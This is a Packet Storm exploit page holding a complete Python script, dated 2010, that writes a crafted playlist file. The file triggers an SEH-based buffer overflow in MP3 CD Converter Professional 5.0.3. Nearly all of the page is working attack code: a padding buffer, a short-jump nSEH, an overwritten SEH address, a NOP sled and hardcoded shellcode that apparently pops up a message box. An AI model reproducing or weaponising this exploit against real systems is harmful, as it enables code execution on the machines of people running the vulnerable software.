MP3 CD Converter Professional version 5.0.3 buffer overflow exploit.
65f01e67dc8d7d9832b9cc02f2ce622f659424cab473c0b33daac7952ed0f269#!/usr/bin/python
#
#
#Python File Created BY C4SS!0 G0MES
#http://www.invasao.com.br
#Louredo_@hotmail.com
#
#
#[+]Exploit Titule: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)
#[+]Date: 12/20/2010
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe
#[+]Version: 5.0.3
#[+]Tested On: WIN-XP SP3 Virtual Box
#[+]CVE: N/A
#
#
#
import os
import sys
import struct
import time
def usage():
os.system("cls")
os.system("color 4f")
print("\n"
"=====================================================================\n"
"|| ||\n"
"|| Exploit Buffer Overflow MP3 CD Converter Professional(SEH) ||\n"
"|| Author C4SS!0 G0M3S ||\n||"
" ||\n"
"=====================================================================\n\n")
print("[+]Exploit: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)")
print("[+]Date: 12/20/2010")
print("[+]Author: C4SS!0 G0M3S")
print("[+]E-mail: Louredo_@hotmail.com")
print("[+]Home: http://www.invasao.com.br")
print("[+]Impact: Hich")
print("[+]Version: 5.0.3")
print("[+]Country: Brazil\n")
if len(sys.argv) !=2:
usage()
print "[-]Usage: "+sys.argv[0]+" <File Name>"
print "[-]Exemple: "+sys.argv[0]+" Exploit.pls"
sys.exit(0)
buffer = "\x41" * 780
nseh = "\xeb\x0d\x90\x90" #JMP SHORT 14
seh = struct.pack('<L',0x0077cebf)
nops = "\x90" * 10
usage()
print "[*]Identifying the length Shellcode"
time.sleep(1)
shellcode = ("\x33\xC0\x33\xC9\x33\xD2\x33\xDB\x50\x68\x6C\x6C\x20\x20\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x54\x58\xBB\x7B\x1D\x80\x7C\x50"
"\xFF\xD3\x90\x33\xD2\x52\xB9\x5E\x67\x30\xEF\x81\xC1\x11\x11\x11\x11\x51\x68\x61\x67\x65\x42\x68\x4D\x65\x73\x73\x54\x5A\x52\x50"
"\xB9\x30\xAE\x80\x7C\xFF\xD1\x33\xC9\x33\xD2\x33\xDB\x51\x68\x53\x20\x20\x20\x68\x47\x30\x4D\x33\x68\x53\x21\x30\x20\x68\x20\x43"
"\x34\x53\x68\x64\x20\x42\x79\x68\x6F\x69\x74\x65\x68\x45\x78\x70\x6C\x54\x59\x53\x68\x21\x30\x20\x20\x68\x43\x34\x53\x53\x54\x5B"
"\x6A\x40\x53\x51\x52\xFF\xD0\x33\xC0\x50\xBE\xFA\xCA\x81\x7C\xFF\xD6")
print "[*]The length is Shellcode:"+str(len(shellcode))
time.sleep(1)
payload = str(buffer+nseh+seh+nops+shellcode)
print "[*]Creating the Archive "+sys.argv[1]
time.sleep(1)
file = sys.argv[1]
try:
f=open(file,"w")
f.write(payload)
f.close()
print "[*]The Archive was created "+str(file)+" Success"
time.sleep(1)
except:
print "[-]Error Creating File "+file
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed